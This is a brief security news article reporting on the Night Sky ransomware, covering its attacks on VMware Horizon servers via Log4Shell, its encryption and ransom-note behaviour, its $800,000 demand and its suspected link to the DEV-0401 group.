A newly discovered ransomware called Night Sky is joining other threat groups in attacking corporate networks and stealing data for extortion against VMware Horizon servers.
According to researchers, the Night Sky ransomware launched its operations at the end of December last year and immediately terrorised several corporate victims in a brief period. The ransomware was first found when the threat group had disclosed and leaked data of its first two victims.
The ransomware group has a Tor data leak website portraying a single victim based in Bangladesh and another corporate network hailing from Japan. The threat actors also asked for a ransom of approximately $800,000 from one of the victims in exchange for a decryptor; otherwise, they threatened to leak the exfiltrated data if not paid immediately.
While Night Sky ransomware operates its attack, the payload encrypts all files apart from files ending with [.]exe or [.]dd file extensions.
The ransomware attached the [.]nightsky extension to encrypted file names. In every folder, a ransom note coded as ‘NightSkyReadMe[.]hta’ is deployed by the threat actors, containing additional instructions and information on how to accomplish the ransom payment.
It then utilises email addresses and a clear website that activate a communications system called ‘Rocket[.]Chat.’ However, it can only be accessed by the victim since the minimum requirement to log into the Rocket[.]Chat URL is detailed inside the ransom note and contains the required credentials.
Researchers believe that the origin of Night Sky ransomware is somehow related to a China-based malicious threat group called DEV-0401 since it has been using the method of Night Sky. Additionally, these Chinese threat actors exploit the Log4Shell flaw to obtain VMware Horizon systems.
Ransomware attacks are among the most prominent and hostile threats to corporates worldwide. New ransomware variants and families such as Night Sky are being discovered constantly. This rapid increase of newly formed ransomware implies that it is still profitable for malicious entities.